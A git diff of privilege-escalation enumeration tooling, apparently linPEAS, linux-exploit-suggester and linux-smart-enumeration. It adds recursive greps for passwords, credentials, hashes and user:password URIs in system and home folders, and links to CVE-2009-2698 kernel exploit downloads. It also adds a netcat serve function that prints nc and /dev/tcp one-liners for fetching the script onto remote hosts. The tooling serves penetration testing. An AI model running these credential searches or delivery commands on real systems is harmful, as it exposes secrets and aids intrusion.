/etc /root /mnt /Users /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | head -n 70 | sed -E "s,$pwd_in_variables,${C}[1;31m&${C}[0m,g" + printf $Y"[+] "$GREEN"Finding possible password variables inside key folders (limit 140)\n"$NC + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables2,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables3,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables4,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables5,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables6,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables7,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables8,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables9,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables10,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables11,${C}[1;31m&${C}[0m,g" + timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables2,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables3,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables4,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables5,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables6,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables7,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables8,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables9,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables10,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables11,${C}[1;31m&${C}[0m,g" echo "" ##-- IF) Find possible conf files with passwords printf $Y"[+] "$GREEN"Finding possible password in config files\n"$NC - ppicf=`find /home /etc /root /tmp /Users /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" 2>/dev/null` + ppicf=`find $HOMESEARCH /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" 2>/dev/null` printf "$ppicf\n" | while read f; do if [ "`grep -EiI 'passwd.*|creden.*' \"$f\" 2>/dev/null`" ]; then echo $ITALIC" $f"$NC - grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -E "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${C}[1;31m&${C}[0m,g" + grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${C}[1;31m&${C}[0m,g" fi done echo "" ##-- IF) Find possible files with usernames printf $Y"[+] "$GREEN"Finding 'username' string inside key folders (limit 70)\n"$NC - timeout 120 grep -RiIE "username.*[=:].+" /home /var/www /var/backups /tmp /etc /root /mnt /Users /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | head -n 70 | sed -E "s,[uU][sS][eE][rR][nN][aA][mM][eE],${C}[1;31m&${C}[0m,g" + timeout 150 grep -RiIE "username.*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${C}[1;31m&${C}[0m,g" + timeout 150 grep -RiIE "username.*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${C}[1;31m&${C}[0m,g" echo "" ##-- IF) Specific hashes inside files @@ -2668,31 +3185,31 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}' regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}' regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}' - timeout 120 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc /var/backups /tmp /var/tmp /var/www /root /home /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | head -n 70 | sed "s,:.*,${C}[1;31m&${C}[0m," + timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${C}[1;31m&${C}[0m," echo "" fi if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then ##-- IF) Specific hashes inside files - printf $Y"[+] "$GREEN"Searching md5/sha1/sha256/sha512 hashes inside files (limit 50)\n"$NC + printf $Y"[+] "$GREEN"Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)\n"$NC regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)' regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)' regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)' regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)' - timeout 120 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc /var/backups /tmp /var/tmp /var/www /root /home /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " There are more hashes files in the previous parent folder"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${C}[1;31m&${C}[0m," | sed "s,There are more hashes files in the previous parent folder,${C}[1;32m&${C}[0m," + timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${C}[1;31m&${C}[0m," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m," echo "" fi if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then ##-- IF) Find URIs with user:password@hoststrings printf $Y"[+] "$GREEN"Finding URIs with user:password@host inside key folders\n"$NC - timeout 120 grep -RiIE "://(.+):(.+)@" /var/www /var/backups /tmp /etc /var/log /private/var/log 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 120 grep -RiIE "://(.+):(.+)@" /home 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 120 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 120 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 120 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 120 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" - timeout 120 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -E "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /var/www $backup_folders_row /tmp /etc /var/log /private/var/log 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" $HOMESEARCH 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /root 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" + timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g" echo "" fi fi diff --git a/linux-exploit-suggester.sh b/linux-exploit-suggester.sh index fc5d5b8..b35ed0e 100755 --- a/linux-exploit-suggester.sh +++ b/linux-exploit-suggester.sh @@ -256,21 +256,39 @@ EOF ) EXPLOITS[((n++))]=$(cat <=2.6.1,ver<=2.6.19 -Tags: +Tags: debian=4 Rank: 1 src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/9574.tgz exploit-db: 9574 +analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html +author: spender +Comments: /proc/sys/vm/mmap_min_addr needs to equal 0 OR pulseaudio needs to be installed EOF ) EXPLOITS[((n++))]=$(cat <=2.6.1,ver<=2.6.19 +Name: ${txtgrn}[CVE-2009-2698]${txtrst} hoagie_udp_sendmsg +Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86 Tags: debian=4 Rank: 1 exploit-db: 9575 +analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html +author: andi +Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 +EOF +) + +EXPLOITS[((n++))]=$(cat <=2.6.1,ver<=2.6.19,x86 +Tags: debian=4 +Rank: 1 +src-url: https://github.com/Kabot/Unix-Privilege-Escalation-Exploits-Pack/raw/master/2009/CVE-2009-2698/katon.c +analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html +author: VxHell Labs +Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 EOF ) @@ -279,7 +297,10 @@ Name: ${txtgrn}[CVE-2009-2698]${txtrst} ip_append_data Reqs: pkg=linux-kernel,ver>=2.6.1,ver<=2.6.19,x86 Tags: fedora=4|5|6,RHEL=4 Rank: 1 +analysis-url: https://blog.cr0.org/2009/08/cve-2009-2698-udpsendmsg-vulnerability.html exploit-db: 9542 +author: p0c73n1 +Comments: Works for systems with /proc/sys/vm/mmap_min_addr equal to 0 EOF ) @@ -871,6 +892,18 @@ author: Vitaly 'vnik' Nikolenko EOF ) +EXPLOITS[((n++))]=$(cat < # GitHub: https://github.com/diego-treitos/linux-smart-enumeration # -lse_version="1.11" +lse_version="3.2" #( Colors # @@ -82,132 +83,198 @@ lse_distro=`command -v lsb_release >/dev/null 2>&1 && lsb_release -d | sed 's/De lse_passed_tests="" lse_executed_tests="" lse_DEBUG=false +lse_procmon_data=`mktemp` +lse_procmon_lock=`mktemp` + +# printf +printf "$reset" | grep -q '\\' && alias printf="env printf" # internal data -lse_common_setuid=( - '/bin/fusermount' - '/bin/mount' - '/bin/ntfs-3g' - '/bin/ping' - '/bin/ping6' - '/bin/su' - '/bin/umount' - '/lib64/dbus-1/dbus-daemon-launch-helper' - '/sbin/mount.ecryptfs_private' - '/sbin/mount.nfs' - '/sbin/pam_timestamp_check' - '/sbin/pccardctl' - '/sbin/unix2_chkpwd' - '/sbin/unix_chkpwd' - '/usr/bin/Xorg' - '/usr/bin/arping' - '/usr/bin/at' - '/usr/bin/beep' - '/usr/bin/chage' - '/usr/bin/chfn' - '/usr/bin/chsh' - '/usr/bin/crontab' - '/usr/bin/expiry' - '/usr/bin/firejail' - '/usr/bin/fusermount' - '/usr/bin/fusermount-glusterfs' - '/usr/bin/gpasswd' - '/usr/bin/kismet_capture' - '/usr/bin/mount' - '/usr/bin/mtr' - '/usr/bin/newgidmap' - '/usr/bin/newgrp' - '/usr/bin/newuidmap' - '/usr/bin/passwd' - '/usr/bin/pkexec' - '/usr/bin/procmail' - '/usr/bin/staprun' - '/usr/bin/su' - '/usr/bin/sudo' - '/usr/bin/sudoedit' - '/usr/bin/traceroute6.iputils' - '/usr/bin/umount' - '/usr/bin/weston-launch' - '/usr/lib/chromium-browser/chrome-sandbox' - '/usr/lib/dbus-1.0/dbus-daemon-launch-helper' - '/usr/lib/dbus-1/dbus-daemon-launch-helper' - '/usr/lib/eject/dmcrypt-get-device' - '/usr/lib/openssh/ssh-keysign' - '/usr/lib/policykit-1/polkit-agent-helper-1' - '/usr/lib/polkit-1/polkit-agent-helper-1' - '/usr/lib/pt_chown' - '/usr/lib/snapd/snap-confine' - '/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper' - '/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic' - '/usr/lib/xorg/Xorg.wrap' - '/usr/libexec/Xorg.wrap' - '/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache' - '/usr/libexec/dbus-1/dbus-daemon-launch-helper' - '/usr/libexec/gstreamer-1.0/gst-ptp-helper' - '/usr/libexec/openssh/ssh-keysign' - '/usr/libexec/polkit-1/polkit-agent-helper-1' - '/usr/libexec/pt_chown' - '/usr/libexec/qemu-bridge-helper' - '/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper' - '/usr/sbin/exim4' - '/usr/sbin/grub2-set-bootflag' - '/usr/sbin/mount.nfs' - '/usr/sbin/mtr-packet' - '/usr/sbin/pam_timestamp_check' - '/usr/sbin/pppd' - '/usr/sbin/pppoe-wrapper' - '/usr/sbin/suexec' - '/usr/sbin/unix_chkpwd' - '/usr/sbin/userhelper' - '/usr/sbin/usernetctl' - '/usr/sbin/uuidd' -) +lse_common_setuid=" +/bin/fusermount +/bin/mount +/bin/ntfs-3g +/bin/ping +/bin/ping6 +/bin/su +/bin/umount +/lib64/dbus-1/dbus-daemon-launch-helper +/sbin/mount.ecryptfs_private +/sbin/mount.nfs +/sbin/pam_timestamp_check +/sbin/pccardctl +/sbin/unix2_chkpwd +/sbin/unix_chkpwd +/usr/bin/Xorg +/usr/bin/arping +/usr/bin/at +/usr/bin/beep +/usr/bin/chage +/usr/bin/chfn +/usr/bin/chsh +/usr/bin/crontab +/usr/bin/expiry +/usr/bin/firejail +/usr/bin/fusermount +/usr/bin/fusermount-glusterfs +/usr/bin/gpasswd +/usr/bin/kismet_capture +/usr/bin/mount +/usr/bin/mtr +/usr/bin/newgidmap +/usr/bin/newgrp +/usr/bin/newuidmap +/usr/bin/passwd +/usr/bin/pkexec +/usr/bin/procmail +/usr/bin/staprun +/usr/bin/su +/usr/bin/sudo +/usr/bin/sudoedit +/usr/bin/traceroute6.iputils +/usr/bin/umount +/usr/bin/weston-launch +/usr/lib/chromium-browser/chrome-sandbox +/usr/lib/dbus-1.0/dbus-daemon-launch-helper +/usr/lib/dbus-1/dbus-daemon-launch-helper +/usr/lib/eject/dmcrypt-get-device +/usr/lib/openssh/ssh-keysign +/usr/lib/policykit-1/polkit-agent-helper-1 +/usr/lib/polkit-1/polkit-agent-helper-1 +/usr/lib/pt_chown +/usr/lib/snapd/snap-confine +/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper +/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic +/usr/lib/xorg/Xorg.wrap +/usr/libexec/Xorg.wrap +/usr/libexec/abrt-action-install-debuginfo-to-abrt-cache +/usr/libexec/dbus-1/dbus-daemon-launch-helper +/usr/libexec/gstreamer-1.0/gst-ptp-helper +/usr/libexec/openssh/ssh-keysign +/usr/libexec/polkit-1/polkit-agent-helper-1 +/usr/libexec/pt_chown +/usr/libexec/qemu-bridge-helper +/usr/libexec/spice-gtk-x86_64/spice-client-glib-usb-acl-helper +/usr/sbin/exim4 +/usr/sbin/grub2-set-bootflag +/usr/sbin/mount.nfs +/usr/sbin/mtr-packet +/usr/sbin/pam_timestamp_check +/usr/sbin/pppd +/usr/sbin/pppoe-wrapper +/usr/sbin/suexec +/usr/sbin/unix_chkpwd +/usr/sbin/userhelper +/usr/sbin/usernetctl +/usr/sbin/uuidd +" #regex rules for common setuid -lse_common_setuid+=( - '/snap/core/.*' - '/var/tmp/mkinitramfs.*' -) +lse_common_setuid="$lse_common_setuid +/snap/core/.* +/var/tmp/mkinitramfs.* +" #critical writable files -lse_critical_writable=( - '/etc/apache2/apache2.conf' - '/etc/apache2/httpd.conf' - '/etc/hosts.allow' - '/etc/hosts.deny' - '/etc/httpd/conf/httpd.conf' - '/etc/httpd/httpd.conf' - '/etc/incron.conf' - '/etc/incron.d/*' - '/etc/passwd' - '/etc/php*/fpm/pool.d/*' - '/etc/php/*/fpm/pool.d/*' - '/etc/shadow' - '/etc/sudoers' - '/etc/supervisor/conf.d/*' - '/etc/supervisor/supervisord.conf' - '/etc/uwsgi/apps-enabled/*' - '/root/.ssh/authorized_keys' -) +lse_critical_writable=" +/etc/apache2/apache2.conf +/etc/apache2/httpd.conf +/etc/bash.bashrc +/etc/bash_completion +/etc/bash_completion.d/* +/etc/environment +/etc/environment.d/* +/etc/hosts.allow +/etc/hosts.deny +/etc/httpd/conf/httpd.conf +/etc/httpd/httpd.conf +/etc/incron.conf +/etc/incron.d/* +/etc/logrotate.d/* +/etc/modprobe.d/* +/etc/pam.d/* +/etc/passwd +/etc/php*/fpm/pool.d/* +/etc/php/*/fpm/pool.d/* +/etc/profile +/etc/profile.d/* +/etc/rc*.d/* +/etc/rsyslog.d/* +/etc/shadow +/etc/skel/* +/etc/sudoers +/etc/sudoers.d/* +/etc/supervisor/conf.d/* +/etc/supervisor/supervisord.conf +/etc/sysctl.conf +/etc/sysctl.d/* +/etc/uwsgi/apps-enabled/* +/root/.ssh/authorized_keys +" +#critical writable directories +lse_critical_writable_dirs=" +/etc/bash_completion.d +/etc/cron.d +/etc/cron.daily +/etc/cron.hourly +/etc/cron.weekly +/etc/environment.d +/etc/logrotate.d +/etc/modprobe.d +/etc/pam.d +/etc/profile.d +/etc/rsyslog.d/ +/etc/sudoers.d/ +/etc/sysctl.d +/root +" #) #( Options lse_color=true +lse_alt_color=false lse_interactive=true +lse_proc_time=60 lse_level=0 #Valid levels 0:default, 1:interesting, 2:all lse_selection="" #Selected tests to run. Empty means all. +lse_find_opts='-path /proc -prune -o -path /sys -prune -o -path /dev -prune -o' #paths to exclude from searches +lse_grep_opts='--color=always' #) #( Lib cecho() { if $lse_color; then - printf "$@" + printf "%b" "$@" else # If color is disabled we remove it - printf "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g' + printf "%b" "$@" | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g' fi } +lse_recolor() { + o_white="$white" + o_lyellow="$lyellow" + o_grey="$grey" + o_lred="$lred" + o_lgreen="$lgreen" + o_lcyan="$lcyan" + + white="$o_grey" + lyellow="$o_lred" + grey="$lgrey" + lred="$red" + lgreen="$b_lgreen$black" + lcyan="$cyan" +} lse_error() { cecho "${red}ERROR: ${reset}$*\n" >&2 } +lse_exclude_paths() { + local IFS=" +" + for p in `printf "%s" "$1" | tr ',' '\n'`; do + [ "`printf \"%s\" \"$p\" | cut -c1`" = "/" ] || lse_error "'$p' is not an absolute path." + p="${p%%/}" + lse_find_opts="$lse_find_opts -path ${p} -prune -o" + done +} lse_set_level() { case "$1" in 0|1|2) @@ -223,34 +290,41 @@ lse_help() { echo "Use: $0 [options]" echo echo " OPTIONS" - echo " -c Disable color" - echo " -i Non interactive mode" - echo " -h This help" - echo " -l LEVEL Output verbosity level" - echo " 0: Show highly important results. (default)" - echo " 1: Show interesting results." - echo " 2: Show all gathered information." - echo " -s SELECTION Comma separated list of sections or tests to run. Available" - echo " sections:" - echo " usr: User related tests." - echo " sud: Sudo related tests." - echo " fst: File system related tests." - echo " sys: System related tests." - echo " sec: Security measures related tests." - echo " ret: Recurren tasks (cron, timers) related tests." - echo " net: Network related tests." - echo " srv: Services related tests." - echo " pro: Processes related tests." - echo " sof: Software related tests." - echo " ctn: Container (docker, lxc) related tests." - echo " Specific tests can be used with their IDs (i.e.: usr020,sud)" + echo " -c Disable color" + echo " -C Use alternative color scheme" + echo " -i Non interactive mode" + echo " -h This help" + echo " -l LEVEL Output verbosity level" + echo " 0: Show highly important results. (default)" + echo " 1: Show interesting results." + echo " 2: Show all gathered information." + echo " -s SELECTION Comma separated list of sections or tests to run. Available" + echo " sections:" + echo " usr: User related tests." + echo " sud: Sudo related tests." + echo " fst: File system related tests." + echo " sys: System related tests." + echo " sec: Security measures related tests." + echo " ret: Recurrent tasks (cron, timers) related tests." + echo " net: Network related tests." + echo " srv: Services related tests." + echo " pro: Processes related tests." + echo " sof: Software related tests." + echo " ctn: Container (docker, lxc) related tests." + echo " Specific tests can be used with their IDs (i.e.: usr020,sud)" + echo " -e PATHS Comma separated list of paths to exclude. This allows you" + echo " to do faster scans at the cost of completeness" + echo " -p SECONDS Time that the process monitor will spend watching for" + echo " processes. A value of 0 will disable any watch (default: 60)" + echo " -S Serve the lse.sh script in this host so it can be retrieved" + echo " from a remote host." } lse_ask() { local question="$1" # We use stderr to print the question cecho "${white}${question}: ${reset}" >&2 - read answer - case answer in + read -r answer + case "$answer" in y|Y|yes|Yes|ok|Ok|true|True) return 0 ;; @@ -264,7 +338,7 @@ lse_request_information() { if $lse_interactive; then cecho "${grey}---\n" [ -z "$lse_user" ] && lse_user=`lse_ask "Could not find current user name. Current user?"` - lse_pass=`lse_ask "If you know the current user password, write it here for better results"` + lse_pass=`lse_ask "If you know the current user password, write it here to check sudo privileges"` cecho "${grey}---\n" fi } @@ -272,7 +346,7 @@ lse_test_passed() { # Checks if a test passed by ID local id="$1" for i in $lse_passed_tests; do - [ "$i" == "$id" ] && return 0 + [ "$i" = "$id" ] && return 0 done return 1 } @@ -300,7 +374,7 @@ lse_test() { if [ "$lse_selection" ]; then local sel_match=false for s in $lse_selection; do - if [ "$s" == "$id" ] || [ "$s" == "${id:0:3}" ]; then + if [ "$s" = "$id" ] || [ "$s" = "`printf \"%s\" \"$id\" | cut -c1-3`" ]; then sel_match=true fi done @@ -319,7 +393,7 @@ lse_test() { # Check dependencies local non_met_deps="" for d in $deps; do - lse_test_passed "$d" || non_met_deps+="$d" + lse_test_passed "$d" || non_met_deps="$non_met_deps $d" done if [ "$non_met_deps" ]; then cecho " ${grey}skip\n" @@ -332,8 +406,8 @@ lse_test() { return 1 fi - # If level is 2 we do not execute level 2 tests unless their output needs - # to be assigned to a variable + # If level is 2 and lse_level is less than 2, then we do not execute + # level 2 tests unless their output needs to be assigned to a variable if [ $level -ge 2 ] && [ $lse_level -lt 2 ] && [ -z "$var" ]; then cecho " ${grey}skip\n" return 1 @@ -341,20 +415,20 @@ lse_test() { if $lse_DEBUG; then output="`eval "$cmd" 2>&1`" else - # Execute comand + # Execute command if this test's level is in scope output="`eval "$cmd" 2>/dev/null`" # Assign variable if available fi - [ "$var" ] && eval "$var='$output'" + [ "$var" ] && [ "$output" ] && readonly "${var}=$output" # Mark test as executed - lse_executed_tests+=" $id" + lse_executed_tests="$lse_executed_tests $id" fi if [ -z "$output" ]; then - cecho "${grey} nope${reset}\n" + cecho " ${grey}nope${reset}\n" return 1 else - lse_passed_tests+=" $id" + lse_passed_tests="$lse_passed_tests $id" cecho "${r} yes!${reset}\n" if [ $lse_level -ge $level ]; then cecho "${grey}---$reset\n" @@ -365,6 +439,8 @@ lse_test() { fi } lse_show_info() { + echo + cecho "${lcyan} LSE Version:${reset} $lse_version\n" echo cecho "${lblue} User:${reset} $lse_user\n" cecho "${lblue} User ID:${reset} $lse_user_id\n" @@ -387,6 +463,41 @@ lse_show_info() { cecho "${lblue}Architecture:${reset} $lse_arch\n" echo } +lse_serve() { + # get port + which nc >/dev/null || lse_error "Could not find 'nc' netcat binary." + + local_ips="`ip a | grep -Eo 'inet ([0-9]{1,3}\.){3}[0-9]{1,3}' | cut -d' ' -f2`" + + # Get a valid and non used port + port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'` + port_valid=true + while true; do + for ip in $local_ips; do + nc -z "$ip" "$port" && port_valid=false + done + if [ $((port)) -lt 1024 ] || [ $((port)) -gt 65500 ]; then + port_valid=false + fi + $port_valid && break + port=`od -An -N2 -i /dev/random|grep -Eo '[0-9]+'` + done + + echo + cecho " Serving ${white}Linux Smart Enumeration${reset} on port ${blue}$port${reset}.\n" + echo + cecho " Depending on your IP and available tools, some of these commands should download it in a remote host:\n" + for ip in $local_ips; do + [ "$ip" = "127.0.0.1" ] && continue + echo + cecho "${reset} [${blue}$ip${reset}]\n" + cecho "${green} * ${white}nc ${reset} $ip $port > lse.sh /dev/tcp/${reset}$ip/$port;printf '\\\\n'>&3;cat<&3>lse.sh;exec 3<&-;chmod 755 lse.sh\n" + done + nc -l -q0 -p "$port" < "$0" >/dev/null +} lse_header() { local id="$1" shift @@ -397,7 +508,7 @@ lse_header() { if [ "$lse_selection" ]; then local sel_match=false for s in $lse_selection; do - if [ "${s:0:3}" == "$id" ]; then + if [ "`printf \"%s\" \"$s\"|cut -c1-3`" = "$id" ]; then sel_match=true break fi @@ -406,18 +517,45 @@ lse_header() { fi for i in $(seq ${#title} 70); do - text+="=" + text="$text=" done - text+="(${green} $title ${magenta})=====" + text="$text(${green} $title ${magenta})=====" cecho "$text${reset}\n" } lse_exit() { local ec=1 local text="\n${magenta}==================================" [ "$1" ] && ec=$1 - text+="(${green} FINISHED ${magenta})==================================" + text="$text(${green} FINISHED ${magenta})==================================" cecho "$text${reset}\n" - exit $ec + rm -f "$lse_procmon_data" + rm -f "$lse_procmon_lock" + exit "$ec" +} +lse_procmon() { + # monitor processes + #NOTE: The first number will be the number of occurrences of a process due to + # uniq -c + while [ -f "$lse_procmon_lock" ]; do + ps -ewwwo start_time,pid,user:50,args + sleep 0.001 + done | grep -v 'ewwwo start_time,pid,user:50,args' | sed 's/^ *//g' | tr -s '[:space:]' | grep -v "^START" | grep -Ev '[^ ]+ [^ ]+ [^ ]+ \[' | sort -Mr | uniq -c | sed 's/^ *//g' > "$lse_procmon_data" +} +lse_proc_print() { + # Pretty prints output from lse_procmom received via stdin + printf "${green}%s %8s %8s %s\n" "START" "PID" "USER" "COMMAND" + while read -r l; do + p_num=`echo "$l" | cut -d" " -f1` + p_time=`echo "$l" | cut -d" " -f2` + p_pid=`echo "$l" | cut 